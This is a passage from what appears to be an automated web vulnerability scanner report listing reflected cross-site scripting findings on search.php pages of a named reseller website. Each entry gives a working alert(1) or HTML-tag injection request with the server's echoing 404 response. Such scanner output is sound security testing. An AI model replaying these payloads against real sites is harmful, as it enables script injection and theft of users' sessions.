<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbed74<a>749c8176eca&opt=2 was not found on this server.</p>
...[SNIP]...

2.3318. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 58ed4<a>ed9e8c47083 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...58ed4<a>ed9e8c47083&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.php?keyword=search...58ed4<a>ed9e8c47083&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3319. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cb51a<script>alert(1)</script>db82a91065e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&cb51a<script>alert(1)</script>db82a91065e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&cb51a<script>alert(1)</script>db82a91065e=1 was not found on this server.</p>
...[SNIP]...

2.3320. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c347b<a>98ad835a2d6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2c347b<a>98ad835a2d6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2c347b<a>98ad835a2d6 was not found on this server.</p>
...[SNIP]...

2.3321. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 298bb<script>alert(1)</script>3b1408e8a55 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail298bb<script>alert(1)</script>3b1408e8a55/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail298bb<script>alert(1)</script>3b1408e8a55/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3322. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d795b<script>alert(1)</script>bba65085939 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46d795b<script>alert(1)</script>bba65085939/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46d795b<script>alert(1)</script>bba65085939/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3323. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b98e2<script>alert(1)</script>8b1e3a8d505 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themesb98e2<script>alert(1)</script>8b1e3a8d505/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themesb98e2<script>alert(1)</script>8b1e3a8d505/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3324. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e5046<script>alert(1)</script>b6dd1d31727 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmose5046<script>alert(1)</script>b6dd1d31727/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmose5046<script>alert(1)</script>b6dd1d31727/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3325. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 143fb<script>alert(1)</script>3cf6416a342 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images143fb<script>alert(1)</script>3cf6416a342/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images143fb<script>alert(1)</script>3cf6416a342/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3326. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1466c<script>alert(1)</script>6617e78e0dc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/search.php1466c<script>alert(1)</script>6617e78e0dc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php1466c<script>alert(1)</script>6617e78e0dc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3327. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 10f9f<a>1999a66f3cb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search10f9f<a>1999a66f3cb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search10f9f<a>1999a66f3cb&opt=2 was not found on this server.</p>
...[SNIP]...

2.3328. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 91a17<a>fa9fa046d81 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...91a17<a>fa9fa046d81&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php?keyword=search...91a17<a>fa9fa046d81&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3329. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bde9e<script>alert(1)</script>74a3d488b17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&bde9e<script>alert(1)</script>74a3d488b17=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&bde9e<script>alert(1)</script>74a3d488b17=1 was not found on this server.</p>
...[SNIP]...

2.3330. http://www.resellerbase.com/detail/46/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload eb882<a>704cb26c74 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2eb882<a>704cb26c74 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2eb882<a>704cb26c74 was not found on this server.</p>
...[SNIP]...

2.3331. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 241ba<script>alert(1)</script>fe663bfbd7f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail241ba<script>alert(1)</script>fe663bfbd7f/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail241ba<script>alert(1)</script>fe663bfbd7f/46/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3332. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c331<script>alert(1)</script>4ad6b6e8b7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/469c331<script>alert(1)</script>4ad6b6e8b7d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/469c331<script>alert(1)</script>4ad6b6e8b7d/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3333. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 36739<script>alert(1)</script>fa27ffc4ef5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes36739<script>alert(1)</script>fa27ffc4ef5/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes36739<script>alert(1)</script>fa27ffc4ef5/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3334. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2914<script>alert(1)</script>45c053f30cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmosb2914<script>alert(1)</script>45c053f30cc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmosb2914<script>alert(1)</script>45c053f30cc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3335. http://www.resellerbase.com/detail/46/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/46/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d434b<script>alert(1)</script>48baec20360 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/search.phpd434b<script>alert(1)</script>48baec20360?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/
